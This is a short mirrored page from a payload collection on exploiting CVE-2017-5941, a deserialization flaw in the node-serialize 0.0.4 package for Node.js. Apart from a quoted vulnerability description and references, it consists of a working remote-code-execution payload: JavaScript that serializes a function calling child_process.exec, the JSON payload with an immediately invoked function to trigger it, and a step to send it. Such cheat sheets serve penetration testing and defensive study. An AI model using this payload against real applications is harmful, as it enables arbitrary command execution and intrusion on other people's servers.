mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 02:46:10 +00:00
34 lines
1.3 KiB
Markdown
34 lines
1.3 KiB
Markdown
|
# Node
|
||
|
|
|
||
|
|
## Summary
|
||
|
|
|
||
|
|
* [Exploit](#exploit)
|
||
|
|
* [References](#references)
|
||
|
|
|
||
|
|
## Exploit
|
||
|
|
|
||
|
|
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
|
||
|
|
|
||
|
|
1. Generate a serialized payload
|
||
|
|
```js
|
||
|
|
var y = {
|
||
|
|
rce : function(){
|
||
|
|
require('child_process').exec('ls /', function(error,
|
||
|
|
stdout, stderr) { console.log(stdout) });
|
||
|
|
},
|
||
|
|
}
|
||
|
|
var serialize = require('node-serialize');
|
||
|
|
console.log("Serialized: \n" + serialize.serialize(y));
|
||
|
|
```
|
||
|
|
2. Add bracket `()` to force the execution
|
||
|
|
```js
|
||
|
|
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
|
||
|
|
```
|
||
|
|
3. Send the payload
|
||
|
|
|
||
|
|
|
||
|
|
## References
|
||
|
|
|
||
|
|
* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
|
||
|
|
* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
|
||
|
|
* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|